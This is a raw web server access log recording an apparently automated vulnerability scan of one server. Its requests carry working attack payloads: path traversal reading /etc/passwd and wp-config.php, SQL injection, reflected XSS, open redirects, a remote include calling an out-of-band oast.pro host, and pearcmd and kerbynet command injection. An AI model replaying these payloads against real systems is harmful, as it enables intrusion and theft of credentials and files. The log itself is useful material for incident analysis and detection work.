/sys/ui/extend/varkind/custom.jsp - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 405 0 1 393 2023-11-09 15:12:26 103.153.214.94 POST /sys/ui/extend/varkind/custom.jsp - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 405 0 1 2309 2023-11-09 15:14:37 103.153.214.94 POST /servlet/~ic/bsh.servlet.BshServlet - 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 405 0 1 3575 2023-11-09 15:14:40 103.153.214.94 POST /servlet/~ic/bsh.servlet.BshServlet - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 405 0 1 391 2023-11-09 15:15:06 103.153.214.94 GET /servlet/codesettree flag=c&status=1&codesetid=1&parentid=-1&categories=~31~27~20union~20all~20select~20~27hongjing~27~2c~40~40version~2d~2d 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 377 2023-11-09 15:15:09 103.153.214.94 GET /api/dp/rptsvcsyncpoint ccid=1 443 - 101.35.195.134 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 0 2 3962 2023-11-09 15:15:15 103.153.214.94 POST /weaver/org.apache.xmlrpc.webserver.XmlRpcServlet - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 405 0 1 1609 2023-11-09 15:15:31 103.153.214.94 GET /view/action/download_file.php filename=../../../../../../../../../etc/passwd&savename=gjlvv.txt 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 378 2023-11-09 15:15:34 103.153.214.94 GET /webui/ g=sys_dia_data_down&file_name=../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 388 2023-11-09 15:15:38 103.153.214.94 POST /cgi-bin/rpc - 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 405 0 1 365 2023-11-09 15:15:46 103.153.214.94 GET /upgrade/detail.jsp/login/LoginSSO.jsp id=1%20UNION%20SELECT%20md5(999999999)%20as%20id%20from%20HrmResourceManager 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 2079 2023-11-09 15:15:49 103.153.214.94 POST /zentao/user-login.html - 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F https://bcvt.kontum.gov.vn/zentao/user-login.html 405 0 1 384 2023-11-09 15:15:49 103.153.214.94 POST /mobile/plugin/browser.jsp - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 385 2023-11-09 15:17:11 103.153.214.94 POST /general/index/UploadFile.php m=uploadPicture&uploadType=eoffice_logo&userId 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 3365 2023-11-09 15:17:15 103.153.214.94 GET /images/logo/logo-eoffice.php - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 392 2023-11-09 15:19:06 103.153.214.94 GET /_vti_inf.html - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 1910 2023-11-09 15:19:46 103.153.214.94 GET /users/sign_in - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 382 2023-11-09 15:20:05 103.153.214.94 GET /level/16/exec/show/config/CR - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 372 2023-11-09 15:20:21 103.153.214.94 GET / lang=../../../../../usr/local/php/pearcmd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 396 2023-11-09 15:20:26 103.153.214.94 GET / - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 395 2023-11-09 15:20:29 103.153.214.94 GET / +config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/safedog()+ZzNE7cWlkl.log 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 1221 2023-11-09 15:20:57 103.153.214.94 POST /uapjs/jsinvoke/ action=invoke 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 405 0 1 377 2023-11-09 15:21:00 103.153.214.94 GET /2XwZKi0BY3BFuoWaySInI8B1iS7.jsp - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 385 2023-11-09 15:21:34 103.153.214.94 GET /mail/src/compose.php mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 385 2023-11-09 15:21:52 103.153.214.94 GET /index.php redirect=http%3A%2F%2Fwww.interact.sh 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 412 2023-11-09 15:22:00 103.153.214.94 GET /names.nsf/People OpenView 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 365 2023-11-09 15:22:21 103.153.214.94 GET /sap/bc/BSp/sap/menu/fameset.htm sap--essioncmd=close&sapexiturl=https%3a%2f%2finteract.sh 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 1965 2023-11-09 15:22:34 103.153.214.94 GET /search.htm searchstring2&searchstring=%27%3E%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 375 2023-11-09 15:24:01 103.153.214.94 GET /horde/admin/user.php - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 1161 2023-11-09 15:24:05 103.153.214.94 GET /admin/user.php - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 301 0 0 515 2023-11-09 15:24:12 103.153.214.94 GET /src/redirect.php plugins[]=../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 384 2023-11-09 15:24:16 103.153.214.94 GET /jira/secure/BrowseProject.jspa id=%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 384 2023-11-09 15:25:07 103.153.214.94 GET /index.php option=com_rsfiles&task=files.display&path=../../../../../../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 386 2023-11-09 15:25:10 103.153.214.94 GET /redirect.php/"><script>alert(document.domain)</script> subject=server&server=test 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 385 2023-11-09 15:25:25 103.153.214.94 GET /index.php appservlang=%3Csvg%2Fonload=confirm%28%27xss%27%29%3E 443 - 101.35.195.134 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 395 2023-11-09 15:25:25 103.153.214.94 POST /login.action - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 387 2023-11-09 15:25:46 103.153.214.94 GET /wp-content/plugins/sniplets/modules/syntax_highlight.php libpath=../../../../wp-config.php 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 393 2023-11-09 15:26:56 103.153.214.94 GET /index.php sl=../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 439 2023-11-09 15:27:07 103.153.214.94 GET /exchweb/bin/redir.asp URL=https://interact.sh 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 8 0 1616 2023-11-09 15:27:13 103.153.214.94 GET /CookieAuth.dll GetLogon?url=%2Fexchweb%2Fbin%2Fredir.asp%3FURL%3Dhttps%3A%2F%2Finteract.sh&reason=0 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 431 2023-11-09 15:28:25 103.153.214.94 GET /src/addressbook.php %3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 394 2023-11-09 15:28:27 103.153.214.94 GET /index.php option=com_imagebrowser&folder=../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 389 2023-11-09 15:28:33 103.153.214.94 GET /src/options.php optpage=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 416 2023-11-09 15:28:35 103.153.214.94 GET /src/search.php mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&what=x&where=BODY&submit=Search 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 374 2023-11-09 15:28:41 103.153.214.94 GET /src/search.php mailbox=INBOX&what=x&where=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&submit=Search 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 365 2023-11-09 15:28:43 103.153.214.94 GET /src/help.php chapter=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 393 2023-11-09 15:28:56 103.153.214.94 GET /index.php option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc%2Fpasswd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 384 2023-11-09 15:29:19 103.153.214.94 GET /phpPgAdmin/index.php _language=../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 388 2023-11-09 15:30:23 103.153.214.94 GET /components/com_ionfiles/download.php file=../../../../../../../../etc/passwd&download=1 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 387 2023-11-09 15:30:40 103.153.214.94 GET /components/com_rwcards/captcha/captcha_image.php img=../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 380 2023-11-09 15:30:41 103.153.214.94 GET /webshell4/login.php errcode=0&login=\%22%20onfocus=alert(document.domain);%20autofocus%20\%22&err=U 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 397 2023-11-09 15:30:56 103.153.214.94 GET /index.php currentpath=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 1193 2023-11-09 15:31:02 103.153.214.94 GET /index.php option=com_pro_desk&include_file=../../../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 385 2023-11-09 15:31:11 103.153.214.94 GET /api.php action=logout&forward=http://interact.sh 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 0 2 3596 2023-11-09 15:32:40 103.153.214.94 GET /cs.html url=http://www.interact.sh 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 377 2023-11-09 15:33:09 103.153.214.94 GET /horde/util/barcode.php type=../../../../../../../../../../../etc/./passwd%00 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 433 2023-11-09 15:33:24 103.153.214.94 GET /cgi-bin/kerbynet Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 386 2023-11-09 15:33:31 103.153.214.94 GET /comm.php id=../../../../../../../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 1121 2023-11-09 15:33:34 103.153.214.94 GET /viewrq.php format=ps&var_filename=../../../../../../../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 418 2023-11-09 15:34:01 103.153.214.94 GET /CFIDE/wizards/common/_logintowizard.cfm %22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 388 2023-11-09 15:34:07 103.153.214.94 GET /index.php option=com_cmimarketplace&Itemid=70&viewit=/../../../../../../etc/passwd&cid=1 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 373 2023-11-09 15:34:07 103.153.214.94 POST /scripts/setup.php - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 405 0 1 3084 2023-11-09 15:34:11 103.153.214.94 GET /adm/file.cgi next_file=%2fetc%2fpasswd 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 1154 2023-11-09 15:34:29 103.153.214.94 GET /components/com_moofaq/includes/file_includer.php gzip=0&file=/../../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 369 2023-11-09 15:34:34 103.153.214.94 GET /index.php option=com_projectfork§ion=../../../../../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 383 2023-11-09 15:35:52 103.153.214.94 GET /index.php option=com_agora&task=profile&page=avatars&action=../../../../../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 364 2023-11-09 15:36:21 103.153.214.94 GET /index.php option=com_album&Itemid=128&target=../../../../../../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 388 2023-11-09 15:37:21 103.153.214.94 GET /index.php option=com_omphotogallery&controller=../../../../../../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 1219 2023-11-09 15:37:28 103.153.214.94 GET /adm/krgourl.php DOCUMENT_ROOT=http://cl6fbhsfe7k9sg331pogm1oyp8akd9qes.oast.pro 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 385 2023-11-09 15:38:00 103.153.214.94 GET /index.php option=com_kif_nexus&controller=../../../../../../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 385 2023-11-09 15:39:02 103.153.214.94 GET /wgarcmin.cgi NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 393 2023-11-09 15:39:18 103.153.214.94 GET /index.php option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 391 2023-11-09 15:39:33 103.153.214.94 GET /index.php option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 387 2023-11-09 15:39:49 103.153.214.94 GET /plugins/content/jw_allvideos/includes/download.php file=../../../../../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 393 2023-11-09 15:39:54 103.153.214.94 GET /plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php files[]=/etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 366 2023-11-09 15:40:01 103.153.214.94 GET /awstats/awredir.pl url=interact.sh 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 382 2023-11-09 15:40:04 103.153.214.94 GET /cgi-bin/awstats/awredir.pl url=interact.sh 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 1159 2023-11-09 15:41:07 103.153.214.94 GET /index.php option=com_jvideodirect&controller=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 385 2023-11-09 15:41:41 103.153.214.94 GET /index.php option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 1126 2023-11-09 15:41:48 103.153.214.94 POST /axis2-admin/login - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 405 0 1 417 2023-11-09 15:41:51 103.153.214.94 GET /index.php option=com_jcollection&controller=../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 2001 2023-11-09 15:41:53 103.153.214.94 GET /index.php option=com_gcalendar&controller=../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 382 2023-11-09 15:41:53 103.153.214.94 POST /axis2/axis2-admin/login - 443 - 101.35.195.134 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 405 0 1 1611 2023-11-09 15:42:34 103.153.214.94 GET /index.php option=com_cartweberp&controller=../../../../../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 385 2023-11-09 15:42:40 103.153.214.94 GET /index.php option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 385 2023-11-09 15:42:42 103.153.214.94 GET /index.php option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 1152 2023-11-09 15:43:00 103.153.214.94 GET /index.php option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 384 2023-11-09 15:43:23 103.153.214.94 GET /index.php option=com_janews&controller=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 382 2023-11-09 15:44:33 103.153.214.94 GET /index.php option=com_dwgraphs&controller=../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 410 2023-11-09 15:44:44 103.153.214.94 GET /index.php option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 382 2023-11-09 15:45:13 103.153.214.94 GET /index.php option=com_jinventory&controller=../../../../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 384 2023-11-09 15:46:01 103.153.214.94 GET /index.php option=com_joomlapicasa2&controller=../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 1121 2023-11-09 15:46:03 103.153.214.94 GET /index.php option=com_joomlaupdater&controller=../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 384 2023-11-09 15:46:51 103.153.214.94 GET /index.php option=com_svmap&controller=../../../../../../../etc/passwd%00 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 64 